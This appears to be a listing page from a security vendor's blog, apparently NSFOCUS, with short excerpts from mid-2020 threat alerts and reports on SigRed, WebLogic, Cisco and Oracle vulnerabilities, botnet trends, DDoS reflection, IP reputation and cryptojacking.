Microsoft Windows DNS Server Remote Code Execution Vulnerability SigRed (CVE-2020-1350) Threat Alert
agosto 11, 2020
Overview
On July 14, 2020 local time, Microsoft addressed a wormable Windows DNS server vulnerability dubbed SigRed (CVE-2020-1350) in its latest monthly patch updates. Once exploited by attackers, the vulnerability could spread between vulnerable computers without user interaction, thereby probably infecting the network of the whole organization.
It is reported that the vulnerability has existed for 17 years and assigns a score of 10 (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H/E:P/RL:O/RC:C).
When a DNS server parses uploaded queries or responds to forwarded requests, the vulnerability could be exploited.
Check Point researchers found that sending DNS responses containing SIG records (greater than 64 KB) could cause a stack-based buffer overflow, further allowing attackers to control a server.
(mais…)Botnet Trend Report -5
agosto 10, 2020
Spear Phishing and Malicious Documents
In the past few years, including malicious attachments in emails has become one of the most common methods that APT groups and various cybercriminal groups use to launch spear phishing attacks. Compared with previous years, 2019 saw more spear phishing attacks with a bigger impact, which was linked with the following facts.
(mais…)FBI Warning: New DDoS Reflection Attacks Are Coming, Are You Ready?
agosto 7, 2020
According to ZDNet’s reports, FBI released a warning last week that some new network protocols were used by criminals to launch large-scale DDoS attacks. Three protocols and one Web applications were found as DDoS attack vectors, including CoAP, WS-DD, ARMS and Web-based Jenkins.
(mais…)WebLogic Remote Code Execution Vulnerabilities (CVE-2020-14625, CVE-2020-14644, CVE-2020-14645, CVE-2020-14687) Threat Alert
agosto 7, 2020
Overview
On July 15, 2020, Beijing time, Oracle released a Critical Patch Update (CPU) for July 2020 that fixes 443 vulnerabilities of different risk levels.
The WebLogic Server Core component is prone to four severe vulnerabilities with a CVSS base score of 9.8, which are assigned CVE-2020-14625, CVE-2020-14644, CVE-2020-14645, and CVE-2020-14687 respectively.
These vulnerabilities are related to T3 and IIOP protocols and allow unauthenticated attackers to execute code remotely via the Internet.
T3 and IIOP protocols are used to transmit data between WebLogic and other Java programs. The default WebLogic installation automatically enables the console, which, in turn, enables the T3 protocol by default. IIOP allows access to remote objects in the form of Java interfaces, which is enabled by default.
(mais…)2019 Cybersecurity Insights -14
agosto 5, 2020
Malware Threats from Mobile Platforms
Nowadays, smartphones are ubiquitous. Android, as a widely used mobile operating system, is vulnerable to an increasing large number of malware families owing to its openness and privilege issues. Such malware can even be spread via legal channels, including Google Store.
(mais…)Multiple Cisco Vulnerabilities Threat Alert 2020
agosto 4, 2020
Overview
On July 15, 2020 local time, Cisco released security advisories to address vulnerabilities across multiple products, including five Critical vulnerabilities with a CVSS base score of 9.8 (CVE-2020-3330, CVE-2020-3323, CVE-2020-3144, CVE-2020-3331, and CVE-2020-3140).
Reference link:
Botnet Trend Report -4
agosto 3, 2020
In the reconnaissance phase, a bad actor can determine which targets to attack through batch scanning. Such scanning is often focused on user names and passwords for access to and vulnerabilities in devices. Besides, an attacker may try to compromise targets by delivering malicious baits to their email addresses collected previously.
(mais…)Oracle July 2020 Critical Patch Update for All Product Families Threat Alert
julho 31, 2020
Overview
On July 14, 2020 local time, Oracle released its July 2020 Critical Patch Update (CPU), its own security advisories, and third-party security bulletins, which fix 443 vulnerabilities of varying severity levels. For details about affected products and available patches, see the appendix.
(mais…)IP Reputation Report-07262020
julho 30, 2020
1.Top 10 countries in attack counts:
The above diagram shows the top 10 regions with the most malicious IP addresses from the NSFOCUS IP Reputation databases at July 26, 2020.
(mais…)2019 Cybersecurity Insights -13
julho 29, 2020
Cryptojacking Malware
In 2019, the pickup in cryptocurrency prices led to an increase in the number of cryptojacking malware families. Of all these families, Monero mining trojans still took a dominant place. EternalBlue and weak password cracking were the major methods for ransomware families to compromise large enterprises in financial and telecom sectors and spread themselves. At the same time, to defeat detection devices, cryptojacking malware families have been constantly upgraded to evolve into more variants that feature better stealth and a modular design.
(mais…)